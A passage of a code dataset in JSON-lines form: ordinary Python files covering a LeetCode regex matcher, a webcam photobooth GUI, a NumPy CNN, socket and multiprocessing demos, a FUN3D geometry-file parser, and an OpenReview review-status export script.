a-z, and characters like . or *.\n# Example 1:\n#\n# Input:\n# s = \"aa\"\n# p = \"a\"\n# Output: false\n# Explanation: \"a\" does not match the entire string \"aa\".\n# Example 2:\n#\n# Input:\n# s = \"aa\"\n# p = \"a*\"\n# Output: true\n# Explanation: '*' means zero or more of the preceding element, 'a'. Therefore, by repeating 'a' once, it becomes \"aa\".\n# Example 3:\n#\n# Input:\n# s = \"ab\"\n# p = \".*\"\n# Output: true\n# Explanation: \".*\" means \"zero or more (*) of any character (.)\".\n# Example 4:\n#\n# Input:\n# s = \"aab\"\n# p = \"c*a*b\"\n# Output: true\n# Explanation: c can be repeated 0 times, a can be repeated 1 time. Therefore, it matches \"aab\".\n# Example 5:\n#\n# Input:\n# s = \"mississippi\"\n# p = \"mis*is*p*.\"\n# Output: false\n\n\nclass Solution:\n def isMatch(self, string: str, pattern: str) -> bool:\n \"\"\"\n # string = aa\n # pat = a* True\n\n # s = \"aab\"\n # p = \"c*a*b\" True\n\n # s = \"mississippi\"\n # p = \"mis*is*[]p*.\" False\n\n # '.' Matches any single character. [a-zA-Z0-9_]\n # '*' Matches zero or more of the preceding element\n\n We use a boolean 2D matrix where\n dp[i][j] reprs does pattern[:j] match string[:i]\n 0 1 2 3 4 5 6 7 8\n # '' . * b c . * . e\n # 0 '' T T T T T T T T T\n # 1 a F T\n # 2 b F\n # 3 c F\n # 4 b F\n # 5 b F\n # 6 e F\n \"\"\"\n return self.dp_soln(string, pattern)\n\n def dp_soln(self, string: str, pattern: str) -> bool:\n dp = [[False] * (len(pattern) + 1) for _ in range(len(string) + 1)]\n\n dp[0][0] = True\n # deal with patterns like a*, .*, a*b*\n for i in range(1, len(pattern) + 1):\n if pattern[i - 1] == '*':\n dp[0][i] = dp[0][i - 2]\n\n for i in range(1, len(string) + 1):\n for j in range(1, len(pattern) + 1):\n if pattern[j - 1] in {string[i - 1], '.'}:\n dp[i][j] = dp[i - 1][j - 1]\n elif pattern[j - 1] == '*':\n dp[i][j] = dp[i][j - 2] # use zero elems for *\n if pattern[j - 2] == '.' or pattern[j - 2] == string[i - 1]:\n dp[i][j] = dp[i][j - 2] or dp[i - 1][j]\n else:\n dp[i][j] = False\n\n return dp[-1][-1]\n\n\n\"\"\"\nRuntime: 52 ms, faster than 61.10% of Python3 online submissions for Regular Expression Matching.\nMemory Usage: 14.1 MB, less than 5.55% of Python3 online submissions for Regular Expression Matching.\n\"\"\"\n","repo_name":"SamSamhuns/wallbreakers_projekts","sub_path":"Leetcode/week_3/p0010_regular_expression_matching.py","file_name":"p0010_regular_expression_matching.py","file_ext":"py","file_size_in_byte":2912,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"74423519146","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with This program. If not, see .\n\nimport sys\nimport cv\nfrom PyQt4 import uic, QtGui, QtCore\nfrom cv2 import *\nfrom photo import Photo\nfrom settings import AUTO_PRINT, PATCH_BACKGROUND_IMG, PATCH_LOGO_IMG\n\n\nclass PyPhotoBooth:\n def __init__(self):\n self.photo = Photo()\n self.photo_live = True\n self.global_count = 0\n self.MainWindow = uic.loadUi('main.ui')\n self.webcam = cv.CreateCameraCapture(-1)\n self.timer = QtCore.QTimer(self.MainWindow)\n self.MainWindow.connect(\n self.timer, QtCore.SIGNAL('timeout()'), self.show_frame\n )\n self.MainWindow.connect(\n self.MainWindow.pushButton, QtCore.SIGNAL(\"clicked()\"),\n self.take_photo\n )\n if AUTO_PRINT:\n self.MainWindow.pushButton_2.hide()\n else:\n self.MainWindow.connect(\n self.MainWindow.pushButton_2, QtCore.SIGNAL(\"clicked()\"),\n self.print_photo_button\n )\n if PATCH_BACKGROUND_IMG is not None:\n palette = QtGui.QPalette()\n palette.setBrush(\n QtGui.QPalette.Background, QtGui.QBrush(\n QtGui.QPixmap(PATCH_BACKGROUND_IMG)\n )\n )\n self.MainWindow.setPalette(palette)\n if PATCH_LOGO_IMG is not None:\n self.MainWindow.lbllogo.setPixmap(\n QtGui.QPixmap(PATCH_LOGO_IMG)\n )\n self.timer.start(1)\n\n def take_photo(self):\n self.photo.take(self)\n\n def print_photo_button(self):\n result, count = self.photo.printing(self.global_count)\n if result:\n self.MainWindow.lcdNumber.display(0)\n self.MainWindow.lcdNumber.repaint()\n self.MainWindow.pick_01.setText(' ')\n self.MainWindow.pick_01.repaint()\n self.MainWindow.pick_02.setText(' ')\n self.MainWindow.pick_02.repaint()\n self.MainWindow.pick_03.setText(' ')\n self.MainWindow.pick_03.repaint()\n self.global_count = count\n\n def show_frame(self):\n if self.photo_live:\n ipl_image = cv.QueryFrame(self.webcam)\n data = ipl_image.tostring()\n image = QtGui.QImage(\n data, ipl_image.width, ipl_image.height, ipl_image.channels\n * ipl_image.width, QtGui.QImage.Format_RGB888)\n pixmap = QtGui.QPixmap()\n pixmap.convertFromImage(image.rgbSwapped())\n self.MainWindow.lblWebcam.setPixmap(pixmap)\n\nif __name__ == \"__main__\":\n app = QtGui.QApplication(sys.argv)\n pyphotobooth = PyPhotoBooth()\n pyphotobooth.MainWindow.show()\n app.exec_()\n","repo_name":"ElDwarf/PyPhotoBooth","sub_path":"src/PyPhotoBooth.py","file_name":"PyPhotoBooth.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"5376436727","text":"import numpy as np\nfrom scipy import signal as sg\n\n# MARK - FUNCTION DEFINITION\n# Sigmoid\ndef sigmoid(x, deriv=False):\n # if the deriv==True then calculate the derivative instead\n if(deriv):\n return x*(1-x)\n\n return 1/(1+np.exp(-x))\n\ndef tanh(x, deriv=False):\n if (deriv):\n return 1 - (x ** 2)\n\n return 2 / (1 + np.exp(-2 * x)) - 1\n\n# Rectified Linear Unit\n# Calculate relu of given x\ndef relu(x, deriv=False):\n # if the deriv==True then calculate the derivative instead\n if (deriv):\n return (x > 0) * 1\n\n return np.maximum(0, x)\n\ndef elu(x, a=0.1, deriv=False):\n if (deriv):\n return np.where(x >= 0, 1, x + a)\n\n return np.where(x >= 0, x, a * (np.exp(x) - 1))\n\n# Zero Pad\n# Adding zero padding to 4D matrix\ndef zero_pad(x, p):\n # Input matrix x must 4D\n assert x.ndim == 4, 'Input not 4D matrix'\n\n # Define which part of the matrix we want to pad\n npad = ((0,0), (p,p), (p,p), (0,0))\n # Return padding calculation result\n return np.pad(x, pad_width=npad, mode='constant', constant_values=0)\n\n# Size After Convolve\n# Calculate size of given x after forward calculation with given f=filter, p=padding, s=stride\ndef size_after_forward(x, f, p=0, s=1):\n return (x - f + 2 * p) / s + 1\n\n# Size Before Convolve\n# Calculate size of given x after backward calculation with given f=filter, p=padding, s=stride\ndef size_after_backward(x, f, p=0, s=1):\n return x * s + f - s - 2 * p\n\n# Max Pooling\n# Calculate Max Pooling of given x=input (3D Matrix) with given f=filter size and s=stride\ndef max_pooling(x, h, w):\n # Input matrix x must 3D\n assert x.ndim == 3, 'Input not 3D matrix'\n\n # Calculate result dimension\n depth = x.shape[2]\n height = size_after_forward(x.shape[0], h, s=h)\n width = size_after_forward(x.shape[1], w, s=w)\n # Initialize result & switch with zero value\n result = np.zeros((height, width, depth))\n switch = np.zeros((height, width, depth))\n\n # Loop through depth of the input\n for i in xrange(depth):\n # Loop through height of the input\n for j in xrange(height):\n # Loop through width of the input\n for k in xrange(width):\n # Calculate max value from filter area of the input\n result[j, k, i] = np.max(x[j*h:j*h+h, k*w:k*w+w, i])\n # Keep track of max index\n switch[j, k, i] = np.argmax(x[j*h:j*h+h, k*w:k*w+w, i])\n\n # Return result and switch value\n return (result, switch)\n\n# Max Pooling\n# Calculate Max Pooling of given x=input (3D Matrix) with given f=filter size and s=stride\ndef unmax_pooling(x, switch, h, w):\n # Input matrix x must 3D\n assert x.ndim == 3, 'Input not 3D matrix'\n\n # Calculate result dimension\n depth = x.shape[2]\n height = size_after_backward(x.shape[0], h, s=h)\n width = size_after_backward(x.shape[1], w, s=w)\n # Initialize result with zero value\n result = np.zeros((height, width, depth))\n\n # Loop through depth of the input\n for i in xrange(x.shape[2]):\n # Loop through height of the input\n for j in xrange(x.shape[0]):\n # Loop through width of the input\n for k in xrange(x.shape[1]):\n # Calculate max value from filter area of the input\n r_index = int((j * h) + (switch[j, k, i] / w))\n c_index = int((k * w) + (switch[j, k, i] % w))\n\n result[r_index, c_index, i] = x[j, k, i]\n\n # Return result and switch value\n return result\n\n# Forward Convolution\n# Calculate feed forward convolution layer for given x=input, filters, and p=padding\ndef forward_conv(x, filters, bias, p=0):\n # Initialize result value with size according to x and filters\n result = np.zeros((x.shape[0], size_after_forward(x.shape[1], filters.shape[1], p), size_after_forward(x.shape[2], filters.shape[2], p), filters.shape[0]))\n\n # Adding zero padding if p != 0\n if (p > 0): x = zero_pad(x, p)\n\n # Convolve each input with each filter\n # Looping through each input\n for i in xrange(x.shape[0]):\n # Looping through each filters\n for j in xrange(filters.shape[0]):\n # Do convolve computation\n # 'valid' means that there is no zero padding\n # Convolve computation resulting 3D matrix so convert it to 2D matrix\n result[i, :, :, j] = (sg.convolve(x[i], filters[j], 'valid')).reshape((result.shape[1], result.shape[2])) + bias[j]\n\n # Call ReLU function (Activation function) for each value\n # Return the ReLU result\n return relu(result)\n\n# Backward Convolution\n# Calculate gradient and delta from given parameters\ndef backward_conv(x, y, error_y, filters, p=0, s=1):\n # Backprop through relu layer first\n delta_y = relu(y, deriv=True) * error_y\n\n # Adding zero padding if p != 0\n if (p > 0): x = zero_pad(x, p)\n\n # Initialize result variable\n delta_result = np.zeros(x.shape)\n gradient_result = np.zeros(filters.shape)\n bias_update_result = np.zeros((delta_y.shape[3]))\n\n # Loop through each delta_y\n for i in xrange(delta_y.shape[0]):\n # Loop through each filters\n # Filters count == dconv\n for j in xrange(filters.shape[0]):\n # Get single layer(2D) from delta input\n s = delta_y[i, :, :, j].reshape((delta_y.shape[1], delta_y.shape[2], 1))\n # Flip the filters along its axis\n f = np.fliplr(np.flipud(filters[j]))\n # Full convolve the delta layer with its corresponded filter\n r = sg.convolve(s, f, 'full')\n # Ignore pad if there is a padding in forward conv\n delta_result[i] += r\n\n # Loop through each image input\n # image count == delta count\n for i in xrange(x.shape[0]):\n # Loop through each delta depth\n for j in xrange(delta_y.shape[3]):\n # Get single layer(2D) from delta input\n f = delta_y[i, :, :, j].reshape((delta_y.shape[1], delta_y.shape[2], 1))\n # Convolve image input with its corresponded delta from next layer\n gradient_result[j] += sg.convolve(x[i], f, 'valid')\n\n # Calculate bias update\n for i in xrange(filters.shape[0]):\n # sum delta_y\n bias_update_result[i] = np.sum(delta_y[:, :, :, i])\n\n # Trim delta result if padded\n if (p > 0): delta_result = delta_result[:, p:-p, p:-p, :]\n\n # Return the delta and gradient result\n return (delta_result, gradient_result, bias_update_result)\n\n\n# Forward Pooling\n# Calculate feed forward pooling layer\ndef forward_pool(x, h, w):\n # Initialize result dimension after pooling\n result = np.zeros((x.shape[0], size_after_forward(x.shape[1], h, s=h), size_after_forward(x.shape[2], w, s=w), x.shape[3]))\n switch = np.zeros(result.shape)\n\n # loop through all input and do max pooling\n for i in xrange(x.shape[0]):\n # Do max pooling\n result[i], switch[i] = max_pooling(x[i], h, w)\n\n # return the result\n return (result, switch)\n\n# Backward Pooling\n# Calculate backward pooling layer\ndef backward_pool(x, switch, h, w):\n # Initialize result dimension after backward pool\n result = np.zeros((x.shape[0], size_after_backward(x.shape[1], h, s=h), size_after_backward(x.shape[2], w, s=w), x.shape[3]))\n\n # loop through all input and do unmax pooling\n for i in xrange(x.shape[0]):\n # Do unmax pooling\n result[i] = unmax_pooling(x[i], switch[i], h, w)\n\n # return the result\n return result\n\n# Forward Softmax\n# Calculate forward Softmax Layer\ndef forward_softmax(x, target):\n exp_scores = np.exp(x)\n probs = exp_scores / np.sum(exp_scores, axis=1, keepdims=True)\n\n # Calculate data loss\n corect_logprobs = -np.log(probs[range(len(target)), target])\n data_loss = np.sum(corect_logprobs)\n data_loss *= 1. / len(target)\n\n # Return the probability and data loss\n return probs, data_loss\n\n# Backward Softmax\n# Calculate backward Softmax Layer\ndef backward_softmax(x, target):\n d = x\n d[range(len(target)), target] -= 1\n\n # Return the scores after backward\n return d\n","repo_name":"sugab/cnn","sub_path":"Pre-Midterm/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":8089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72249601707","text":"\"\"\"\nsocket in unblock way\neach 3 sed fill in log\n\"\"\"\nfrom socket import *\nimport time,os\nf=open(\"log.txt\",\"a+\")\ns=socket()\ns.bind((\"127.0.0.1\",9609))\ns.listen(5)\n#set s into unblock status\ns.setblocking(False)\nif __name__ == '__main__':\n while True:\n print(\"wait for connect\")\n try:\n conn,addr=s.accept()\n except BlockingIOError as e:\n time.sleep(3)\n f.write(\"%s : %s\\n\"%(time.ctime(),e))\n f.flush()\n except Exception:\n f.close()\n s.close()\n os._exit(0)\n else:\n print(\"connect from %s\"%addr)\n\n","repo_name":"zykgithub1/pythonClass","sub_path":"daneiPythonClass/2021_7_7/block_Io.py","file_name":"block_Io.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11993102264","text":"from concurrent.futures import ThreadPoolExecutor\nfrom multiprocessing import Pool\n\nimport numpy as np\nimport multiprocessing\nimport time\n\n\ndef writer(filename, n):\n start = time.time()\n print(\"Let's run: \", time.time())\n with open(filename, 'w') as file:\n for i in range(n):\n file.write('1')\n\n print(\"Finish: \", time.time() - start)\n\n\ndef mega_array(length: int, name: str):\n start = time.time()\n print(\"Let's run: \", time.time())\n\n temp_list = []\n for i in range(length):\n temp_list.append(i)\n\n print(len(temp_list))\n print(\"Finish: \", time.time() - start)\n\n return temp_list\n\n\ndef f(x, y):\n return x*y\n\n\nif __name__ == '__main__':\n cores = 6\n\n # multiprocessing.Process\n # writer('test.txt', 5_000_000 * cores)\n\n # for i in range(cores):\n # t = multiprocessing.Process(target=writer, args=(f'test{i}.txt', 5_000_000))\n # t.start()\n #\n # print(\"All Threads are queued, let's see when they finish!\")\n\n # multiprocessing.Pool\n # print(len(mega_array(5_000_000 * cores)))\n # input()\n #\n # p = multiprocessing.Pool(cores)\n # return_to_list = p.map(mega_array, [5_000_000] * cores)\n #\n # print(len(list(np.concatenate(return_to_list))))\n\n values = [5_000_000] * cores\n names = ['names'] * cores\n p = multiprocessing.Pool(cores)\n array = p.starmap(mega_array, zip(values, names))\n\n print(len(array))\n print('я уже тут')\n\n","repo_name":"apokrif333/Parallelism","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30948711907","text":"r\"\"\"\nThis is a module for interacting with FUN3D input files that define \ngeometry for adaptation. Files defined in the FAUXGeom file \n``faux_input`` can have their surface meshes refined while other \nsurfaces must be frozen.\n\n:See also:\n * :func:`cape.pyfun.cntl.Cntl.ReadFAUXGeom`\n * :func:`cape.pyfun.cntl.Cntl.PrepareFAUXGeom`\n * :func:`cape.pyfun.cntl.Cntl.ReadFreezeSurfs`\n * :func:`cape.pyfun.cntl.Cntl.PrepareFreezeSurfs`\n\"\"\"\n\n# System modules\nimport os.path\n\n# Base this class off of the main file control class.\nclass FAUXGeom(object):\n r\"\"\"File control class for :file:`faux_input`\n \n :Call:\n >>> faux = pyFun.FAUXGeom()\n :Inputs:\n *fname*: :class:`str`\n Name of ``faux_input`` file or template\n :Outputs:\n *faux*: :class:`pyFun.faux.FAUXGeom`\n Interface for ``faux_input`` file\n *faux.nSurf*: :class:`int`\n Number of MapBC surfaces with geometry descriptions\n *faux.Surfs*: :class:`list`\\ [:class:`int`]\n List of surface indices\n *faux.Geom*: :class:`dict` (:class:`float` | :class:`list`)\n Dictionary of geometry definitions\n :Versions:\n * 2017-02-23 ``@ddalle``: First version\n \"\"\"\n \n # Initialization method (not based off of FileCntl)\n def __init__(self, fname=\"faux_input\"):\n r\"\"\"Initialization method\n \n :Versions:\n * 2017-02-23 ``@ddalle``: First version\n \"\"\"\n # Save the file name.\n self.fname = fname\n # Initialize\n self.Surfs = []\n self.Geom = {}\n self.nSurf = 0\n # Read the file\n if (fname is not None) and os.path.isfile(fname):\n self.Read(fname)\n \n # String representation\n def __repr__(self):\n \"\"\"String representation\n \n :Versions:\n * 2017-04-08 ``@ddalle``: First version\n \"\"\"\n return \"\" % (self.fname, self.nSurf)\n \n \n # Read a ``faux_input`` file or template\n def Read(self, fname):\n r\"\"\"Read a ``faux_input`` input file or template\n \n :Call:\n >>> faux.Read(fname)\n :Inputs:\n *fname*: :class:`str`\n Name of ``faux_input`` file or template\n :Versions:\n * 2017-02-23 ``@ddalle``: First version\n \"\"\"\n # Open the file\n lines = open(fname).readlines()\n # Initialize\n self.Surfs = []\n self.Geom = {}\n # Loop through lines\n i = 1\n nline = len(lines)\n while i < nline:\n # Get the values\n V = self.ConvertToVal(lines[i])\n # Check contents\n if len(V) < 3:\n raise ValueError(\n (\"Failure reading FAUXGeom line:\\n%s\\n\" % lines[i]) +\n (\"Must be surface ID (int), geom type (str), and coord\"))\n # Get the type\n typ = V[1]\n # Check it\n if typ in [\"xplane\", \"yplane\", \"zplane\"]:\n # Valid x-plane, y-plane, or z-plane\n self.Geom[V[0]] = {V[1]: V[2]}\n elif typ in [\"general_plane\"]:\n # Read the next line, which is the normal\n i += 1\n n = self.ConvertToVal(lines[i])\n # Valid general plane\n self.Geom[V[0]] = {V[1]: V[2], \"normal\": n}\n # Check if surface already counted\n if V[0] not in self.Surfs:\n # Increase surface count\n self.nSurf += 1\n # Add to the list\n self.Surfs.append(V[0])\n # Move to next line\n i += 1\n # Sort surface list\n self.Surfs.sort()\n \n # Convert a string to a value\n def ConvertToVal(self, val):\n r\"\"\"Convert a text description to a Python value\n \n :Call:\n >>> v = faux.ConvertToVal(val)\n :Inputs:\n *faux*: :class:`pyFun.faux.FAUXGeom`\n Interface for ``faux_input`` file\n *val*: :class:`str` | :class:`unicode`\n Text of the value from file\n :Outputs:\n *v*: :class:`str` | :class:`int` | :class:`float` | \n :class:`list`\n Evaluated value of the text\n :Versions:\n * 2017-02-23 ``@ddalle``: First version\n \"\"\"\n # Check inputs\n if type(val).__name__ not in ['str', 'unicode']:\n # Not text; return as is\n return val\n # Initialize output\n V = []\n # Loop through parts\n for vi in val.split():\n # Attempt to interpret as an integer\n try:\n V.append(int(vi))\n continue\n except Exception:\n pass\n # Attempt to interpret as a float\n try:\n V.append(float(vi))\n except Exception:\n # Just keep as a string\n V.append(vi)\n # Output (list if needed)\n if len(V) == 1:\n # Single output\n return V[0]\n else:\n # Return list\n return V\n \n # Set value for a plane\n def SetGeom(self, comp, geom):\n r\"\"\"Set geometry definition for a component\n \n :Call:\n >>> faux.SetGeom(comp, geom)\n :Inputs:\n *faux*: :class:`pyFun.faux.FAUXGeom`\n Interface for ``faux_input`` file\n *comp*: :class:`int`\n Component index\n *geom*: :class:`dict`\n Geometry description\n :Versions:\n * 2017-02-23 ``@ddalle``: First version\n \"\"\"\n # Check if component already defined.\n if comp not in self.Surfs:\n # Append the component\n self.Surfs.append(comp)\n # Sort again\n self.Surfs.sort()\n # Increase count\n self.nSurf += 1\n # Save the instruction\n self.Geom[comp] = geom\n \n # Write a ``faux_input`` file\n def Write(self, fname=\"faux_input\"):\n r\"\"\"Write FAUXGeom input file\n \n :Call:\n >>> faux.Write(fname=\"faux_input\")\n :Inputs:\n *faux*: :class:`pyFun.faux.FAUXGeom`\n Interface for ``faux_input`` file\n *fname*: {``\"faux_input\"``} | :class:`str`\n Name of file to write\n :Versions:\n * 2017-02-23 ``@ddalle``: First version\n \"\"\"\n # Open the file\n f = open(fname, 'w')\n # Write the number of surfaces.\n f.write('%i\\n' % self.nSurf)\n # Loop through instructions\n for comp in self.Surfs:\n # Get the instruction\n geom = self.Geom[comp]\n # Check the type\n if 'general_plane' in geom:\n # Write a generic plane\n f.write(\" %i general_plane %s\" % (comp,geom[\"general_plane\"]))\n # Write the normal\n f.write(\" \")\n f.write(\" \".join([str(v) for v in geom[\"normal\"]]))\n f.write(\"\\n\")\n elif 'xplane' in geom:\n # Write the xplane\n f.write(\" %i xplane %s\\n\" % (comp, geom[\"xplane\"]))\n elif 'yplane' in geom:\n # Write the xplane\n f.write(\" %i yplane %s\\n\" % (comp, geom[\"yplane\"]))\n elif 'zplane' in geom:\n # Write the xplane\n f.write(\" %i zplane %s\\n\" % (comp, geom[\"zplane\"]))\n # Close the file\n f.close()\n \n","repo_name":"nasa/cape","sub_path":"cape/pyfun/faux.py","file_name":"faux.py","file_ext":"py","file_size_in_byte":7620,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"37"} +{"seq_id":"33316834484","text":"import tensorflow as tf\n\n# create constant nodes\nnode_a = tf.constant(3.0, tf.float32)\nnode_b = tf.constant(4.0)\n\n# Method1\n# sess = tf.Session()\n# print(sess.run([node1, node2]))\n# sess.close()\n\n# Method2\nwith tf.Session() as sess:\n output = sess.run([node_a, node_b])\n print(output)\n","repo_name":"dinkar1708/machine-learning-examples","sub_path":"tensorflow-example/tensor_constant.py","file_name":"tensor_constant.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13925584750","text":"def fact(n):\n\n if n==1:\n return 1\n #5! = 5 * 4\n result = n*fact(n-1)\n return result\n\ndef fibo(n):\n\n if n < 2:\n return n\n\n r1 = fibo(n-1)\n r2 = fibo(n-2)\n return r1 + r2\n\nprint(fibo(4))\n#print(fact(5))\n\ndef fibo_m():\n #if n < 2:\n # memo[n] = n\n # return memo[n]\n\n if memo[n] > 0: #값이 있으면:\n return memo[n]\n else:\n memo[n] = fibo_m(n-1) + fibo(n-2)\n return memo[n]\n\n if n >= 2 and memo[n] == 0:\n memo[n] = fibo_m(n - 1) + fibo_m(n - 2)\n return memo[n]\n\nn = 10\nmemo = [0] * (n+1) # n까지 쓸수 있는 빈공감\nmemo[0] = 0\nmemo[1] = 1\nfibo(10)\n\n","repo_name":"seongbiny/algorithm","sub_path":"SWEA/0818_재귀.py","file_name":"0818_재귀.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"25815244939","text":"def solution(s):\n result = s\n numstr = ['zero', 'one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine']\n\n for j in range(len(numstr)):\n if numstr[j] in s:\n result = result.replace(numstr[j], str(j), )\n return int(result)\n\nif __name__ == '__main__':\n s = 'one4seveneight'\n print(solution(s))","repo_name":"KimSejun-bigd/coding_test","sub_path":"programmers/PROG_숫자 문자열과 영단어.py","file_name":"PROG_숫자 문자열과 영단어.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2790805877","text":"import argparse\nimport openreview\nimport requests\nimport csv\nimport sys, getopt\n\n## Argument handling\nparser = argparse.ArgumentParser()\nparser.add_argument('--baseurl', help=\"base url\")\nparser.add_argument('--username')\nparser.add_argument('--password')\nparser.add_argument('--ofile', help=\"output file name\")\nparser.add_argument('--name', help=\"name of the track: conference or workshop\")\nargs = parser.parse_args()\n\n## Initialize the client library with username and password\nif args.username!=None and args.password!=None:\n client = openreview.Client(baseurl=args.baseurl, username=args.username, password=args.password)\nelse:\n client = openreview.Client(baseurl=args.baseurl)\n## Initialize output file name\nfile_name = \"output.csv\"\nif args.ofile!=None:\n file_name = args.ofile\n## Initialize output file type - check for valid values\noutput_type = 2\n\nconference = 'conference'\nif args.name:\n conference = args.name\n\nclass PaperStatus:\n Unassigned, Assigned, Commented, Reviewed, FullyReviewed = range(5)\n\nPaperStatusString = [\"Unassigned\", \"Assigned\", \"Commented\", \"Reviewed\", \"FullyReviewed\"]\n\n\n# get the info from the review, return NA if not there\ndef get_score(content_type):\n string_var = note.content.get(content_type, \"NA\")\n string_var = string_var.split(':')[0]\n return string_var\n\n# pull all needed info from the database\nsubmissions = client.get_notes(invitation='ICLR.cc/2017/' + conference + '/-/submission')\ninvitation = \"official/review\"\nheaders = {'User-Agent': 'test-create-script', 'Content-Type': 'application/json',\n 'Authorization': 'Bearer ' + client.token}\nanon_reviewers = requests.get(client.baseurl + '/groups?id=ICLR.cc/2017/' + conference + '/paper.*/AnonReviewer.*',\n headers=headers)\ncurrent_reviewers = requests.get(client.baseurl + '/groups?id=ICLR.cc/2017/' + conference + '/paper.*/reviewers',\n headers=headers)\nnotes = client.get_notes(invitation='ICLR.cc/2017/' + conference + '/-/paper.*/' + invitation)\n\n# The following are dictionaries to connect the papers, reviewers and reviews\n# \tthe signature is the whole directory struct leading up to the Anonymized name\n# \tex ICLR.cc/2017/conference/-/paper203/AnonReviewer1\n# reviews[signature] = the review note\nreviews = {}\n# reviewers[signature] = reviewer_name\nreviewers = {}\n# reviewers_by_paper[paper_num][reviewer_name] = review\nreviewers_by_paper = {}\n# paper_status[paper_num] dictionary w/ 'title' (paper title),'count'(number of reviewers),\n#\t\t\t\t\t\t\t\t\t\t\t\t\t 'reviewed', 'percent'(percentage reviewed)\npaper_status = {}\n\n# initialize paper_status for each submission and attach title to paper number\nfor paper in submissions:\n paper_status[paper.number] = {}\n paper_status[paper.number]['title'] = paper.content['title']\n paper_status[paper.number]['count'] = 0\n paper_status[paper.number]['reviewed'] = 0\n paper_status[paper.number]['percent'] = 0\n reviewers_by_paper[paper.number] = {}\n\n# attach review note to the anonymized name\nfor n in notes:\n signature = n.signatures[0]\n reviews[signature] = n\n\n# attach real name to the anonymized name\nfor r in anon_reviewers.json():\n reviewer_id = r['id']\n members = r['members']\n if members:\n reviewers[reviewer_id] = members[0]\n else:\n paper_num = int(reviewer_id.split('paper')[1].split('/Anon')[0])\n if paper_num in paper_status:\n # check if paper wasn't deleted then why is reviewer missing?\n if output_type == 1:\n my_file.write('Reviewer ' + reviewer_id + ' is anonymous\\n')\n else:\n print('Reviewer ' + reviewer_id + ' is anonymous')\n\n# attach reviewers to paper_num\n# add review status paper_status\nfor r in current_reviewers.json():\n reviewer_id = r['id']\n members = r['members']\n if members:\n paper_num = int(reviewer_id.split('paper')[1].split('/reviewers')[0])\n if paper_num in paper_status:\n # if the number isn't in paper_status it means the submission was deleted\n for m in members:\n # add reviewers\n reviewer_name = reviewers.get(m, m)\n reviewers_by_paper[paper_num][reviewer_name] = reviews.get(m, None)\n paper_status[paper_num]['count'] += 1\n if reviewers_by_paper[paper_num][reviewer_name] != None:\n paper_status[paper_num]['reviewed'] += 1\n\n# now that all reviewers have been added to the paper_status\n# for each paper determine how many reviewers have completed reviewing\nfor paper_num in paper_status:\n paper_data = paper_status[paper_num]\n count = paper_data['count']\n paper_data['percent'] = 0\n if count:\n paper_data['percent'] = 100 * paper_data['reviewed'] / count\n\n# sort on % complete (doesn't like being sorted in place)\npaper_status_sorted = sorted(paper_status, key=lambda x: (paper_status[x]['percent'], x))\n\n\n# print results\n# csv\nwith open(file_name, 'wb') as outfile:\n csvwriter = csv.writer(outfile, delimiter=',')\n row = []\n row.append(\"Paper Number\")\n row.append(\"Title\")\n row.append(\"%Review Complete\")\n row.append(\"Reviewer Name\")\n row.append(\"Review Rating\")\n row.append(\"Review Confidence\")\n csvwriter.writerow(row)\n for paper_num in paper_status_sorted:\n reviewers = reviewers_by_paper[paper_num]\n for reviewer, note in reviewers.iteritems():\n row = []\n row.append(paper_num)\n row.append(paper_status[paper_num]['title'])\n row.append(paper_status[paper_num]['percent'])\n row.append(reviewer.encode('utf-8'))\n if note:\n row.append(get_score('rating'))\n row.append(get_score('confidence'))\n else:\n row.append(0)\n row.append(0)\n csvwriter.writerow(row)\n","repo_name":"openreview/openreview-scripts","sub_path":"venues/ICLR.cc/2017/conference/python/get-all-paper-status.py","file_name":"get-all-paper-status.py","file_ext":"py","file_size_in_byte":5895,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"27534736068","text":"from django import forms\r\nfrom .models import Cases\r\n\r\nclass CasesForm(forms.ModelForm):\r\n\t\r\n\tdeadline =forms.DateField(widget=forms.TextInput(\r\n\t\tattrs={'type': 'date'}))\r\n\tfecha_cotizacion =forms.DateField(widget=forms.TextInput(\r\n\t\tattrs={'type': 'date'}))\r\n\t\r\n\t\r\n\tclass Meta:\r\n\t\t\r\n\t\tmodel = Cases\r\n\t\tlabels={\"text\":\"Comentarios\"}\r\n\t\traw_id_fields = (\"status\",)\r\n\t\tfields = ('referencia', 'cliente','mv', 'deadline', 'status', 'numero_cotizacion','fecha_cotizacion','monto_cotizacion','ubicacion', 'text') \r\n","repo_name":"asdrubaldiaz/logistica","sub_path":"followup/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40333608023","text":"from Tacotron2.text import text_to_sequence\nimport models\nimport torch\nimport argparse\nimport numpy as 